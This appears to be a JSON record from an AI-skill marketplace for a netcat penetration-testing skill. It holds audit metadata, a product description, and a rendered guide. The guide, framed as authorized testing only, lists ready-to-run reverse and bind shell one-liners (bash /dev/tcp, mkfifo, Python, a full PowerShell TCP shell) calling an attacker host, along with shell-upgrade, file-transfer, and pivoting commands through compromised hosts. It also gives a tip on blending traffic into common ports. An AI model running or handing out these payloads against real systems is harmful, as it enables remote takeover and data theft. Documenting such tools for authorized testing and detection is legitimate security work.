\"line_start\": 109,\n \"line_end\": 109\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 18,\n \"line_end\": 18\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 19,\n \"line_end\": 19\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 562,\n \"line_end\": 562\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 563,\n \"line_end\": 563\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 564,\n \"line_end\": 564\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 565,\n \"line_end\": 565\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 566,\n \"line_end\": 566\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 309,\n \"line_end\": 309\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 104,\n \"line_end\": 104\n }\n ]\n },\n {\n \"factor\": \"filesystem\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 323,\n \"line_end\": 323\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 323,\n \"line_end\": 323\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 389,\n \"line_end\": 389\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 523,\n \"line_end\": 523\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 389,\n \"line_end\": 389\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 390,\n \"line_end\": 390\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 391,\n \"line_end\": 391\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 453,\n \"line_end\": 453\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 455,\n \"line_end\": 455\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 500,\n \"line_end\": 500\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 500,\n \"line_end\": 500\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 501,\n \"line_end\": 501\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 501,\n \"line_end\": 501\n }\n ]\n },\n {\n \"factor\": \"env_access\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 147,\n \"line_end\": 147\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 132,\n \"line_end\": 132\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 147,\n \"line_end\": 147\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 156,\n \"line_end\": 156\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 157,\n \"line_end\": 157\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 163,\n \"line_end\": 163\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 165,\n \"line_end\": 165\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 424,\n \"line_end\": 424\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 425,\n \"line_end\": 425\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 427,\n \"line_end\": 427\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 430,\n \"line_end\": 430\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 432,\n \"line_end\": 432\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 437,\n \"line_end\": 437\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 437,\n \"line_end\": 437\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 444,\n \"line_end\": 444\n }\n ]\n },\n {\n \"factor\": \"scripts\",\n \"evidence\": [\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 138,\n \"line_end\": 138\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 137,\n \"line_end\": 137\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 6,\n \"total_lines\": 2298,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T15:46:45.414Z\"\n },\n \"content\": {\n \"user_title\": \"Use netcat for network security testing\",\n \"value_statement\": \"Security professionals need documented guidance on using netcat for authorized penetration testing, port scanning, file transfers, and reverse shell establishment. This skill provides comprehensive workflows and command references for offensive security operations with explicit authorization requirements.\",\n \"seo_keywords\": [\n \"netcat\",\n \"network security\",\n \"penetration testing\",\n \"port scanning\",\n \"reverse shell\",\n \"claude\",\n \"codex\",\n \"claude-code\",\n \"banner grabbing\",\n \"file transfer\"\n ],\n \"actual_capabilities\": [\n \"Documentation for TCP/UDP network connections and testing\",\n \"Port scanning and connectivity testing techniques\",\n \"Banner grabbing and service enumeration procedures\",\n \"Reverse shell and bind shell establishment guidance\",\n \"File transfer procedures between systems\",\n \"Relay and pivoting techniques for network movement\"\n ],\n \"limitations\": [\n \"Documentation only - provides no automated script execution\",\n \"Requires external netcat installation (netcat or ncat packages)\",\n \"All operations require explicit written authorization\",\n \"Does not include actual network exploitation tools\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Penetration testers\",\n \"title\": \"Authorized testing operations\",\n \"description\": \"Use documented netcat techniques during authorized red team engagements with proper scoping documentation.\"\n },\n {\n \"target_user\": \"Security auditors\",\n \"title\": \"Network security assessment\",\n \"description\": \"Test network connectivity, port availability, and firewall rules during security assessments.\"\n },\n {\n \"target_user\": \"Defensive analysts\",\n \"title\": \"Threat detection research\",\n \"description\": \"Understand attacker techniques to develop detection and monitoring capabilities for defensive security.\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Basic connectivity test\",\n \"scenario\": \"Test port availability\",\n \"prompt\": \"Show me how to use netcat to test if port 80 is open on target 192.168.1.100 and verify HTTP service availability.\"\n },\n {\n \"title\": \"Banner grabbing\",\n \"scenario\": \"Service enumeration\",\n \"prompt\": \"How do I grab the SSH or SMTP banner from a target system using netcat for service enumeration?\"\n },\n {\n \"title\": \"File transfer\",\n \"scenario\": \"Restricted file movement\",\n \"prompt\": \"Document the commands to transfer a file from one system to another using netcat when standard methods are blocked.\"\n },\n {\n \"title\": \"Authorized shell\",\n \"scenario\": \"Reverse shell setup\",\n \"prompt\": \"Show netcat reverse shell techniques with proper cleanup procedures for authorized penetration testing only.\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"How do I test connectivity and grab HTTP banner from a target?\",\n \"output\": [\n \"TCP connection test: nc -vz \u003ctarget-ip> \u003cport>\",\n \"HTTP banner grab: echo -e 'GET / HTTP/1.0\\\\r\\\\n\\\\r\\\\n' | nc \u003ctarget-ip> 80\",\n \"Verify written authorization before any testing\",\n \"Document all activities for compliance reporting\"\n ]\n },\n {\n \"input\": \"What are the steps for authorized reverse shell testing?\",\n \"output\": [\n \"Confirm written authorization and scope documentation\",\n \"Set up listener on attacker machine: nc -lvnp 4444\",\n \"Execute reverse shell on target (with authorization)\",\n \"Document all commands and connections\",\n \"Clean up all shells and persistence mechanisms after\"\n ]\n },\n {\n \"input\": \"How can I transfer files through restricted networks?\",\n \"output\": [\n \"Receiver: nc -lvnp 5555 > received_file.txt\",\n \"Sender: nc \u003creceiver-ip> 5555 \u003c file_to_send.txt\",\n \"Encrypted transfer: use ncat with --ssl option\",\n \"Verify file integrity with checksum after transfer\"\n ]\n }\n ],\n \"best_practices\": [\n \"Verify written authorization before any network testing\",\n \"Document all activities including timestamps, IPs, ports, and commands executed\",\n \"Clean up all shells, listeners, and persistence mechanisms after engagement completion\"\n ],\n \"anti_patterns\": [\n \"Using netcat techniques without proper written authorization\",\n \"Failing to document penetration testing activities and findings\",\n \"Leaving persistence mechanisms (cron jobs, services) active after engagement completion\"\n ],\n \"faq\": [\n {\n \"question\": \"Is netcat installed by default on systems?\",\n \"answer\": \"Netcat is not always pre-installed. Install with apt-get install netcat-traditional or ncat for enhanced SSL features.\"\n },\n {\n \"question\": \"What is the difference between nc and ncat?\",\n \"answer\": \"ncat (from Nmap) offers SSL encryption, connection relaying, and HTTP proxy support. Use ncat when encryption is required.\"\n },\n {\n \"question\": \"Does this skill execute any code on systems?\",\n \"answer\": \"No. This skill provides documentation and command references only. It does not contain or execute any scripts or payloads.\"\n },\n {\n \"question\": \"Can I use these techniques on any network without permission?\",\n \"answer\": \"No. All techniques require explicit written authorization. Unauthorized network access is illegal and unethical.\"\n },\n {\n \"question\": \"How do I detect netcat activity defensively?\",\n \"answer\": \"Monitor for nc/ncat process execution, -e flag usage, unusual outbound connections, and named pipe creation (mkfifo).\"\n },\n {\n \"question\": \"What security frameworks does this skill reference?\",\n \"answer\": \"MITRE ATT&CK techniques T1059 (Command Shell), T1071 (Application Layer Protocol), T1090 (Proxy), and T1105 (Ingress Tool Transfer).\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"assets\",\n \"type\": \"dir\",\n \"path\": \"assets\",\n \"children\": [\n {\n \"name\": \"ci-config-template.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci-config-template.yml\",\n \"lines\": 358\n },\n {\n \"name\": \"rule-template.yaml\",\n \"type\": \"file\",\n \"path\": \"assets/rule-template.yaml\",\n \"lines\": 356\n }\n ]\n },\n {\n \"name\": \"references\",\n \"type\": \"dir\",\n \"path\": \"references\",\n \"children\": [\n {\n \"name\": \"EXAMPLE.md\",\n \"type\": \"file\",\n \"path\": \"references/EXAMPLE.md\",\n \"lines\": 551\n },\n {\n \"name\": \"WORKFLOW_CHECKLIST.md\",\n \"type\": \"file\",\n \"path\": \"references/WORKFLOW_CHECKLIST.md\",\n \"lines\": 254\n }\n ]\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 567\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":35540,"content_sha256":"c5481234c5334d5c7aba4737ef83bc713e0a5dbefb8350e40348446f3e5e35f9"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Netcat Network Utility","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Netcat (nc) is the \"Swiss Army knife\" of networking tools, providing simple Unix utility for reading and writing data across network connections. This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing.","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": Netcat capabilities can be used maliciously. Only use these techniques in authorized penetration testing environments with proper written permission.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Quick Start","type":"text"}]},{"type":"paragraph","content":[{"text":"Basic connection and listening:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Listen on port 4444\nnc -lvnp 4444\n\n# Connect to remote host\nnc \u003ctarget-ip> \u003cport>\n\n# Banner grab a service\necho \"\" | nc \u003ctarget-ip> 80\n\n# Simple port scan\nnc -zv \u003ctarget-ip> 1-1000","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Netcat Operations Workflow","type":"text"}]},{"type":"paragraph","content":[{"text":"Progress: [ ] 1. Verify authorization for network testing [ ] 2. Test basic connectivity and port availability [ ] 3. Perform banner grabbing and service enumeration [ ] 4. Establish reverse or bind shells (if authorized) [ ] 5. Transfer files between systems [ ] 6. Create relay and pivot connections [ ] 7. Document findings and clean up connections [ ] 8. Remove any backdoors or persistence mechanisms","type":"text"}]},{"type":"paragraph","content":[{"text":"Work through each step systematically. Check off completed items.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. Authorization Verification","type":"text"}]},{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":": Before any netcat operations:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm written authorization for network testing","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify in-scope targets and allowed activities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Understand restrictions on shell access and data exfiltration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document emergency contact procedures","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm cleanup requirements post-engagement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. Basic Connectivity Testing","type":"text"}]},{"type":"paragraph","content":[{"text":"Test network connectivity and port availability:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# TCP connection test\nnc -vz \u003ctarget-ip> \u003cport>\n\n# UDP connection test\nnc -uvz \u003ctarget-ip> \u003cport>\n\n# Test port range\nnc -zv \u003ctarget-ip> 20-30\n\n# Verbose output\nnc -v \u003ctarget-ip> \u003cport>","type":"text"}]},{"type":"paragraph","content":[{"text":"Connection test results","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection succeeded","type":"text","marks":[{"type":"strong"}]},{"text":": Port is open and accepting connections","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection refused","type":"text","marks":[{"type":"strong"}]},{"text":": Port is closed","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection timeout","type":"text","marks":[{"type":"strong"}]},{"text":": Port is filtered by firewall or no response","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. Banner Grabbing","type":"text"}]},{"type":"paragraph","content":[{"text":"Extract service banner information:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# HTTP banner grab\necho -e \"GET / HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80\n\n# SMTP banner grab\necho \"QUIT\" | nc \u003ctarget-ip> 25\n\n# FTP banner grab\necho \"QUIT\" | nc \u003ctarget-ip> 21\n\n# SSH banner grab\nnc \u003ctarget-ip> 22\n\n# Generic banner grab with timeout\ntimeout 2 nc \u003ctarget-ip> \u003cport>","type":"text"}]},{"type":"paragraph","content":[{"text":"Service-specific banner grabbing","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# MySQL banner\nnc \u003ctarget-ip> 3306\n\n# PostgreSQL banner\nnc \u003ctarget-ip> 5432\n\n# SMB/CIFS banner\nnc \u003ctarget-ip> 445\n\n# RDP banner\nnc \u003ctarget-ip> 3389","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Port Scanning","type":"text"}]},{"type":"paragraph","content":[{"text":"Simple port scanning (note: nmap is more comprehensive):","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Scan single port\nnc -zv \u003ctarget-ip> 80\n\n# Scan port range\nnc -zv \u003ctarget-ip> 1-1000\n\n# Scan specific ports\nfor port in 21 22 23 25 80 443 3389; do\n nc -zv \u003ctarget-ip> $port 2>&1 | grep succeeded\ndone\n\n# Fast UDP scan\nnc -uzv \u003ctarget-ip> 53,161,500","type":"text"}]},{"type":"paragraph","content":[{"text":"Limitations of netcat port scanning","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Slower than dedicated port scanners","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Limited stealth capabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"No service version detection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Better for quick ad-hoc testing","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Reverse Shells (Authorized Testing Only)","type":"text"}]},{"type":"paragraph","content":[{"text":"Establish reverse shell connections from target to attacker:","type":"text"}]},{"type":"paragraph","content":[{"text":"Attacker machine (listener)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Start listener\nnc -lvnp 4444\n\n# With verbose output\nnc -lvnp 4444 -v","type":"text"}]},{"type":"paragraph","content":[{"text":"Target machine (connector)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Linux reverse shell\nnc \u003cattacker-ip> 4444 -e /bin/bash\n\n# If -e not available (OpenBSD netcat)\nrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc \u003cattacker-ip> 4444 > /tmp/f\n\n# Python reverse shell\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattacker-ip>\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'\n\n# Bash reverse shell\nbash -i >& /dev/tcp/\u003cattacker-ip>/4444 0>&1\n\n# Windows reverse shell (with ncat)\nncat.exe \u003cattacker-ip> 4444 -e cmd.exe\n\n# PowerShell reverse shell\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('\u003cattacker-ip>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Upgrade reverse shell to interactive TTY","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Python PTY upgrade\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Background shell with Ctrl+Z, then:\nstty raw -echo; fg\nexport TERM=xterm\nexport SHELL=/bin/bash","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Bind Shells (Authorized Testing Only)","type":"text"}]},{"type":"paragraph","content":[{"text":"Create listening shell on target machine:","type":"text"}]},{"type":"paragraph","content":[{"text":"Target machine (listener with shell)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Linux bind shell\nnc -lvnp 4444 -e /bin/bash\n\n# Without -e flag\nrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp 4444 > /tmp/f\n\n# Windows bind shell\nncat.exe -lvnp 4444 -e cmd.exe","type":"text"}]},{"type":"paragraph","content":[{"text":"Attacker machine (connect to bind shell)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"nc \u003ctarget-ip> 4444","type":"text"}]},{"type":"paragraph","content":[{"text":"Bind shell vs Reverse shell","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Bind Shell","type":"text","marks":[{"type":"strong"}]},{"text":": Target listens, attacker connects (blocked by outbound firewalls)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reverse Shell","type":"text","marks":[{"type":"strong"}]},{"text":": Attacker listens, target connects (bypasses inbound firewall rules)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. File Transfers","type":"text"}]},{"type":"paragraph","content":[{"text":"Transfer files between systems:","type":"text"}]},{"type":"paragraph","content":[{"text":"Receiving file (listener)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Receive file on port 5555\nnc -lvnp 5555 > received_file.txt","type":"text"}]},{"type":"paragraph","content":[{"text":"Sending file (connector)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Send file to listener\nnc \u003creceiver-ip> 5555 \u003c file_to_send.txt\n\n# With progress indication\npv file_to_send.txt | nc \u003creceiver-ip> 5555","type":"text"}]},{"type":"paragraph","content":[{"text":"Directory/archive transfer","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Sender: tar and compress directory, send via netcat\ntar czf - /path/to/directory | nc \u003creceiver-ip> 5555\n\n# Receiver: receive and extract\nnc -lvnp 5555 | tar xzf -","type":"text"}]},{"type":"paragraph","content":[{"text":"Large file transfer with verification","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Sender: calculate checksum before sending\nmd5sum large_file.iso\ncat large_file.iso | nc \u003creceiver-ip> 5555\n\n# Receiver: receive and verify\nnc -lvnp 5555 > large_file.iso\nmd5sum large_file.iso","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. Encrypted File Transfer","type":"text"}]},{"type":"paragraph","content":[{"text":"Use ncat with SSL for encrypted transfers:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Receiver with SSL\nncat -lvnp 5555 --ssl > received_file.txt\n\n# Sender with SSL\nncat \u003creceiver-ip> 5555 --ssl \u003c file_to_send.txt\n\n# Generate self-signed certificate for ncat\nopenssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key\nncat -lvnp 5555 --ssl --ssl-cert cert.pem --ssl-key cert.key","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"9. Relay and Pivoting","type":"text"}]},{"type":"paragraph","content":[{"text":"Create relay connections through compromised hosts:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Simple relay: forward connections from port 8080 to internal host\nmkfifo backpipe\nnc -lvnp 8080 0\u003cbackpipe | nc \u003cinternal-target-ip> 80 1>backpipe\n\n# Two-way relay\nnc -lvnp 8080 -c \"nc \u003cinternal-target-ip> 80\"\n\n# Use ncat for more reliable relay\nncat -lvnp 8080 --sh-exec \"ncat \u003cinternal-target-ip> 80\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Pivot chain example","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Compromised Host A (DMZ): relay to internal network\nnc -lvnp 9090 -c \"nc 192.168.1.100 3389\"\n\n# Attacker: connect through pivot\nnc \u003ccompromised-host-a> 9090","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"10. Chat and Communication","type":"text"}]},{"type":"paragraph","content":[{"text":"Simple chat server for covert communication:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Host 1 (listener)\nnc -lvnp 6666\n\n# Host 2 (connector)\nnc \u003chost1-ip> 6666","type":"text"}]},{"type":"paragraph","content":[{"text":"Two-way communication","type":"text","marks":[{"type":"strong"}]},{"text":": Both parties can type and messages appear on both sides.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Considerations","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Authorization & Legal Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Written Permission","type":"text","marks":[{"type":"strong"}]},{"text":": Obtain explicit authorization for all netcat operations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Shell Access","type":"text","marks":[{"type":"strong"}]},{"text":": Reverse/bind shells are invasive, require clear authorization","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data Exfiltration","type":"text","marks":[{"type":"strong"}]},{"text":": File transfers may trigger DLP alerts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Covert Channels","type":"text","marks":[{"type":"strong"}]},{"text":": Relay connections can bypass security controls","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Cleanup","type":"text","marks":[{"type":"strong"}]},{"text":": Remove all shells, listeners, and backdoors post-engagement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Operational Security","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Encryption","type":"text","marks":[{"type":"strong"}]},{"text":": Use ncat with --ssl for encrypted connections","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Logging","type":"text","marks":[{"type":"strong"}]},{"text":": Netcat leaves minimal forensic artifacts but connections are logged","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detection","type":"text","marks":[{"type":"strong"}]},{"text":": IDS/IPS may detect common reverse shell patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Egress Filtering","type":"text","marks":[{"type":"strong"}]},{"text":": Outbound connections may be blocked","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Port Selection","type":"text","marks":[{"type":"strong"}]},{"text":": Use common ports (80, 443, 53) to blend with normal traffic","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Audit Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"Document all netcat activities:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection timestamps and duration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Source and destination IP addresses and ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Type of operation (shell, file transfer, relay)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Commands executed through shells","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Files transferred","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Any errors or connection failures","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1059.004 (Unix Shell)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1071.001 (Web Protocols)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1090 (Proxy/Multi-hop Proxy)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1105 (Ingress Tool Transfer)","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PTES","type":"text","marks":[{"type":"strong"}]},{"text":": Exploitation and post-exploitation 